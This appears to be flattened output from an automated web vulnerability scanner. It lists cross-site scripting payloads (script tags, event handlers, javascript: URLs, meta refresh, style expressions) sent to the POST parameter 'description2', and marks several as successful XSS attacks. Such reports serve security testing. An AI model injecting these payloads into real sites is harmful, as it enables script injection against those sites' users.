| Vulnerable Parameter |
Original Value |
Method |
| description2 |
57845 |
POST |
| Attack Type |
Attack Value |
Error |
| Unfiltered <script> |
<script>alert(String.fromCharCode(78,84,79,95,109,88,118,78,111,87,111,88))</script> |
 |
Successful XSS Attack |
 |
 |
nto_mxvnowox |
 |
 |
 |
 |
|
 |
 |
 |
 |
FORM POST Parameters |
 |
 |
 |
 |
|
| description2 |
<script>alert(String.fromCharCode(78,84,79,95,109,88,118,78,111,87,111,88))</script> |
|
|
 |
|
 |
 |
 |
 |
|
|
| Unfiltered <script> |
<<script>alert(String.fromCharCode(78,84,79,95,119,86,107,81,122,90,116,76));//<</script> |
 |
Successful XSS Attack |
 |
 |
nto_wvkqzztl |
 |
 |
 |
 |
|
 |
 |
 |
 |
FORM POST Parameters |
 |
 |
 |
 |
|
| description2 |
<<script>alert(String.fromCharCode(78,84,79,95,119,86,107,81,122,90,116,76));//<</script> |
|
|
 |
|
 |
 |
 |
 |
|
|
| Unfiltered javascript href |
<a href=javascript:alert(String.fromCharCode(78,84,79,95,107,85,115,76,108,79,115,87))>abc</a> |
 |
Successful XSS Attack |
 |
 |
nto_kusllosw |
 |
 |
 |
 |
|
 |
 |
 |
 |
FORM POST Parameters |
 |
 |
 |
 |
|
| description2 |
<a href=javascript:alert(String.fromCharCode(78,84,79,95,107,85,115,76,108,79,115,87))>abc</a> |
|
|
 |
|
 |
 |
 |
 |
|
|
| Unfiltered <iframe> src |
<iframe src=kXnTuVlS></iframe> |
<iframe src=kXnTuVlS></iframe> |
 |
 |
 |
 |
FORM POST Parameters |
 |
 |
 |
 |
|
| description2 |
<iframe src=kXnTuVlS></iframe> |
|
|
 |
|
 |
 |
 |
 |
|
|
| Unfiltered <iframe> src |
<iframe src=nUqKmRmQ < |
<iframe src=nUqKmRmQ < |
 |
 |
 |
 |
FORM POST Parameters |
 |
 |
 |
 |
|
| description2 |
<iframe src=nUqKmRmQ < |
|
|
 |
|
 |
 |
 |
 |
|
|
| Unfiltered <script> src |
<script src=rPyUoSlX < |
<script src=rPyUoSlX < |
 |
 |
 |
 |
FORM POST Parameters |
 |
 |
 |
 |
|
| description2 |
<script src=rPyUoSlX < |
|
|
 |
|
 |
 |
 |
 |
|
|
| Unfiltered <script> src |
<script src=oYnVqQlL/> |
<script src=oYnVqQlL/> |
 |
 |
 |
 |
FORM POST Parameters |
 |
 |
 |
 |
|
| description2 |
<script src=oYnVqQlL/> |
|
|
 |
|
 |
 |
 |
 |
|
|
| Unfiltered <body> onload |
<body onload=alert(String.fromCharCode(78,84,79,95,117,80,121,87,114,75,122,83))> |
 |
Successful XSS Attack |
 |
 |
nto_upywrkzs |
 |
 |
 |
 |
|
 |
 |
 |
 |
FORM POST Parameters |
 |
 |
 |
 |
|
| description2 |
<body onload=alert(String.fromCharCode(78,84,79,95,117,80,121,87,114,75,122,83))> |
|
|
 |
|
 |
 |
 |
 |
|
|
| Unfiltered javascript |
<div onmouseover=alert(String.fromCharCode(78,84,79,95,111,82,113,85,110,82,119,83))>abc |
 |
Successful XSS Attack |
 |
 |
nto_orqunrws |
 |
 |
 |
 |
|
 |
 |
 |
 |
FORM POST Parameters |
 |
 |
 |
 |
|
| description2 |
<div onmouseover=alert(String.fromCharCode(78,84,79,95,111,82,113,85,110,82,119,83))>abc |
|
|
 |
|
 |
 |
 |
 |
|
|
| Unfiltered style expression |
<a style=width:expression(alert(String.fromCharCode(78,84,79,95,116,86,119,77,118,81,117,83)))>abc |
<a style=width:expression(alert(String.fromCharCode(78,84,79,95,116,86,119,77,118,81,117,83)))>abc |
 |
 |
 |
 |
FORM POST Parameters |
 |
 |
 |
 |
|
| description2 |
<a style=width:expression(alert(String.fromCharCode(78,84,79,95,116,86,119,77,118,81,117,83)))>abc |
|
|
 |
|
 |
 |
 |
 |
|
|
| Unfiltered javascript |
<img src=a onerror=alert(String.fromCharCode(78,84,79,95,110,84,107,81,108,89,115,78))> |
 |
Successful XSS Attack |
 |
 |
nto_ntkqlysn |
 |
 |
 |
 |
|
 |
 |
 |
 |
FORM POST Parameters |
 |
 |
 |
 |
|
| description2 |
<img src=a onerror=alert(String.fromCharCode(78,84,79,95,110,84,107,81,108,89,115,78))> |
|
|
 |
|
 |
 |
 |
 |
|
|
| Unfiltered <meta> javascript |
<meta http-equiv=refresh content=0;javascript:alert(/vOuXsWlZ/)> |
<meta http-equiv=refresh content=0;javascript:alert(/vOuXsWlZ/)> |
 |
 |
 |
 |
FORM POST Parameters |
 |
 |
 |
 |
|
| description2 |
<meta http-equiv=refresh content=0;javascript:alert(/vOuXsWlZ/)> |
|
|
 |
|
 |
 |
 |
 |
|
|
| Unfiltered style javascript |
<div style=background:url(javascript:alert(/wKxRtUvS/))>abc |
<div style=background:url(javascript:alert(/wKxRtUvS/))>abc |
 |
 |
 |
 |
FORM POST Parameters |
 |
 |
 |
 |
|
| description2 |
<div style=background:url(javascript:alert(/wKxRtUvS/))>abc |
|
|
 |
|
 |
 |
 |
 |
|
|
| Unfiltered <script> |
<script>eval(alert(String.fromCharCode(78,84,79,95,113,78,116,89,120,86,122,89)))</script> |
 |
Successful XSS Attack |
 |
 |
nto_qntyxvzy |
 |
 |
 |
 |
|
 |
 |
 |
 |
FORM POST Parameters |
 |
 |
 |
 |
|
| description2 |
<script>eval(alert(String.fromCharCode(78,84,79,95,113,78,116,89,120,86,122,89)))</script> |
|
|
 |
|
 |
 |
 |
 |
|
|
| Unfiltered style javascript |
<div style=background:url(javascript:alert(String.fromCharCode(78,84,79,95,107,89,115,78,114,75,112,80)))>abc |
 |
Successful XSS Attack |
 |
 |
nto_kysnrkpp |
 |
 |
 |
 |
|
 |
 |
 |
 |
FORM POST Parameters |
 |
 |
 |
 |
|
| description2 |
<div style=background:url(javascript:alert(String.fromCharCode(78,84,79,95,107,89,115,78,114,75,112,80)))>abc |
|
|
 |
|
 |
 |
 |
 |
|
|
| Unfiltered javascript |
<img src=a onerror=alert(/xWlTkOlN/)> |
<img src=a onerror=alert(/xWlTkOlN/)> |
 |
 |
 |
 |
FORM POST Parameters |
 |
 |
 |
 |
|
| description2 |
<img src=a onerror=alert(/xWlTkOlN/)> |
|
|
 |
|
 |
 |
 |
 |
|
|
| Unfiltered <meta> javascript |
<meta http-equiv=refresh content=0;javascript:alert(String.fromCharCode(78,84,79,95,116,77,112,81,118,84,115,80))> |
<meta http-equiv=refresh content=0;javascript:alert(String.fromCharCode(78,84,79,95,116,77,112,81,118,84,115,80))> |
 |
 |
 |
 |
FORM POST Parameters |
 |
 |
 |
 |
|
| description2 |
<meta http-equiv=refresh content=0;javascript:alert(String.fromCharCode(78,84,79,95,116,77,112,81,118,84,115,80))> |
|
|
 |
|
 |
 |
 |
 |
|
|
|